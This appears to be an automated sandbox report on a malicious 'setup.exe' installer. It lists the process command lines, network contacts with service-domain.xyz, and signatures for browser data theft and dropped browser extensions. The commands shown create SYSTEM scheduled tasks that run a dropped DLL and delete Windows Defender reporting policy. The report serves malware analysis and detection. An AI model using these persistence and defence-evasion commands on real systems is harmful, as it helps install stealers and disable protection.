schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\OUuKJjg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 03:03:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 addons.mozilla.org udp
US 151.101.193.91:80 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:80 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp

Files


Analysis: behavioral12

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\fXwrAtP.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\ircnoIG.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\ejUsjSAbKxbqc.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\QzjBmRy.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\WpdQVfX.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\TOIdVSI.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\jsSbxq.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\GasXUvu.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\ZKGKZDZ.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{48d314f9-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{48d314f9-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
